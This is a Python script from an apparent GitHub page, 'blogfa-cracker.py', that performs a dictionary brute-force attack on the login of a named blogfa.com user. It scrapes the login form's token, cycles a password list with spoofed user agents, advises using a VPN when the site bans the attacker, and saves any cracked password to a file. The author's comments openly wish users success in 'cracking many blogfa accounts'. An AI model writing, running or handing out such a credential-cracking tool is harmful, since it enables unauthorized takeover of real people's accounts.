-
Notifications
You must be signed in to change notification settings - Fork 1
/
blogfa-cracker.py
199 lines (172 loc) · 8.28 KB
/
blogfa-cracker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
#!/usr/bin/python
# -------------------------------------------------
__AUTHOR__ = 'MOJTABA OR C.S.R OR Mr EXPLOiT'
__TELEGRAM_ID__ = '@creator_typeri'
__INSTAGRAM_ID__ = '@MJi_Devil'
__GITHUB__ = 'https://github.com/C4ssif3r'
__COMMENT__ = '''
hello welcome to the blogfa cracker :)
good luck and i hope because you cracking many blogfa accounts
'''
# -------------------------------------------------
# import mudules |
# -------------------------------------------------
import os
try:
from colorama import Fore, init
except:
os.system('pip install colorama')
# -------------------------------------------------
try:
import time
except:
os.system('pip install time')
# -------------------------------------------------
try:
import requests as rq
except:
os.system('pip install requests')
# -------------------------------------------------
try:
from bs4 import BeautifulSoup
except:
os.system('pip install bs4')
# -------------------------------------------------
import sys
os.system('clear')
init() # from colorama lib
# -------------------------------------------------
'''
_ _ ° _ ',:'/¯/`:,
,·´/:::::'`:, ,:´/::::'`:,' .´/: : :/:`; /:/_/::::/';'
'/ /:::::::::'`·/::/::::::::/'\ /:/:_: /:::'i /:' '`:/::;‘
/,·'´ ¯¯'`·;:::/:;·´ ¯ '`·;/:::i /·´ '`;:::;' ; ';:';‘
/ '`;':/ \:::'; i 'i::; | 'i::i
,' `' ';:::i° '; 'i::;° '; ;'::i
,' ;::i‘' ,. -., '; ';::; 'i 'i::i'
;' ,^, ,:^, 'i::;° /:::::/`:.,; ';::;' ; 'i::;'
'i ;:::\ ;/ ', 'i:;' /;:-:;/:::::'| ;:/`;‘ '; i:/'
'i 'i::/ \ / ; ;/ ,´ `·:;:·' ;/'::/ '; ;/ °
; 'i:/ `*'´ 'i ;/ ° '; `;/' '; / °
'`. ,' '. / '`·, _,.-·'´ ° `'´ °
`*´ `'*'´ '`'*^*'´¯ ” ‘
'''
# -------------------------------------------------
print (Fore.RED+'''
__ _ _ ___ _ _ __ _ _ ___ __
)_) ) / ) / _ )_ /_) __ / ` )_) /_) / ` )_/ )_ )_)
/__) (__ (_/ (__/ ( / / (_. / \ / / (_. / ) (__ / \
BY MJi
comment 3> # *.blogfa.com accounts we are going to crack :)
''') # banner
print(Fore.BLUE+'''
telegram > @creator_typeri | instagram[IG] > @MJi_devil
RUBIKA > @ShubadehBaz
''')
time.sleep(1.0)
try:
pss = sys.argv[1]
except:
print (Fore.WHITE+'['+Fore.CYAN+' # '+Fore.WHITE+'] set target and pass list e:x >\n')
time.sleep(0.8)
print ('launch >>> python mj-blogfa-cracker.py pass.txt target iD\n')
time.sleep(0.6)
print ('pass.txt == your pass list or patch example: home/root/Desktop/mji.txt\n')
time.sleep(0.5)
print ('target in argv2 your target id ')
sys.exit()
try:
tar = sys.argv[2]
except:
print (Fore.WHITE+'['+Fore.CYAN+' # '+Fore.WHITE+'] set target and pass list e:x >\n')
time.sleep(0.8)
print (' how to launch >>> python mj-blogfa-cracker.py pass.txt target\n')
time.sleep(0.6)
print ('pass.txt == your pass list or patch ex: home/root/Desktop/mji.txt\n')
time.sleep(0.5)
print ('target in argv2 your target id ')
sys.exit()
# -------------------------------------------------
print('')
print (Fore.WHITE+'['+Fore.GREEN+'*'+Fore.WHITE+'] checking this user > '+Fore.YELLOW+tar)
print('')
time.sleep(2.4)
# -------------------------------------------------
# chack automatic username |
# -------------------------------------------------
__CHEK__ = ('http://'+tar+'.blogfa.com')
_CHEK_ = rq.get(__CHEK__)
if _CHEK_.status_code == 404:
print (Fore.WHITE+'['+Fore.RED+' ! '+Fore.WHITE+'] User ['+Fore.RED+tar+Fore.WHITE+']'+Fore.WHITE+' not FOUND on ['+Fore.GREEN+'blogfa.com'+Fore.WHITE+']'+Fore.WHITE+' Check user and run again !!! ')
time.sleep(3)
sys.exit()
else:
print (Fore.WHITE+'['+Fore.GREEN+' * '+Fore.WHITE+'] User ['+Fore.GREEN+tar+Fore.WHITE+'] FOUND on '+Fore.WHITE+'['+Fore.GREEN+'blogfa.com'+Fore.WHITE+'] SKIPPING ... !!! ')
print('')
# -------------------------------------------------
print (Fore.RED+'[*]'+Fore.WHITE+'TARGET => '+Fore.CYAN+tar)
print('')
time.sleep(4)
print (Fore.GREEN+'[*]'+Fore.WHITE+'STARTING CRACK PASSWORD FOR ['+Fore.RED+''+tar+Fore.WHITE+'] ...')
print('')
time.sleep(3.0)
# -------------------------------------------------
# _HED's__ |
agnt = ['Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36','Mozilla/5.0 (X11; Linux i686; rv:88.0) Gecko/20100101 Firefox/88.0','Mozilla/5.0 (X11; Linux i686; rv:88.0) Gecko/20100101 Firefox/88.0','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36']
import random
agent = (random.choice(agnt))
# -------------------------------------------------
__HEDBLOG__ = {'Host': 'blogfa.com',
'User-Agent': agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '175',
'Origin': 'https://blogfa.com',
'Connection': 'keep-alive',
'Referer': 'https://blogfa.com/desktop/login.aspx?r=637860193478105692',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
# __HED's__ end
# -------------------------------------------------
# load pass list
pas = open(pss, 'r').read().split()
___URL___ = rq.get('https://blogfa.com/desktop/login.aspx')
__INFO__ = (___URL___).text
__INFORMATION__ = BeautifulSoup(__INFO__, 'html.parser')
t_t = __INFORMATION__.find('input')['value']
# -------------------------------------------------
for __PASS__ in pas:
__PAYLOAD__ = {"_tt":t_t,
"usrid":tar,
"ups":__PASS__,
"btnSubmit":"ورود+به+بخش+مدیریت+وبلاگ"}
_REQS_ = rq.post('https://blogfa.com/desktop/login.aspx', data=__PAYLOAD__, headers=__HEDBLOG__)
_rqPOST_ = (_REQS_).text
blog = BeautifulSoup(_rqPOST_, 'html.parser')
_dta_ = blog.find_all('i')
_data_ = str(_dta_)
___CHECK_AUTHENTICATION___ = ("کلمه عبور را اشتباه وارد کرده اید")
# -------------------------------------------------
if ___CHECK_AUTHENTICATION___ in _data_:
print(Fore.WHITE+'['+Fore.RED+'*'+Fore.WHITE+'] pass NOT found '+Fore.RED+''+__PASS__+'\n')
if 'در حال حاضر به دلیل حفظ امنیت کاربران امکان ورود به بخش مدیریت را ندارید' in _data_:
print(Fore.WHITE+'['+Fore.RED+'*'+Fore.WHITE+'] you banned by site !')
print(Fore.WHITE+'['+Fore.RED+'*'+Fore.WHITE+'] Try again with a VPN !')
sys.exit()
if ___CHECK_AUTHENTICATION___ not in _data_:
print('')
print(Fore.WHITE+'['+Fore.GREEN+'*'+Fore.WHITE+'] pass found '+Fore.CYAN+'>_< '+Fore.GREEN+''+__PASS__)
tr = tar+'.txt'
time.sleep(1.5)
print('')
print (Fore.GREEN+'[#]'+Fore.YELLOW+' I can found pass >_– and saved to ['+tr+'] GOOD LUCK BYTCH !')
time.sleep(1)
# -------------------------------------------------
with open(tr, 'w') as _tar_:
_tar_.write('user > '+tar+' password > '+__PASS__)
time.sleep(3)
sys.exit()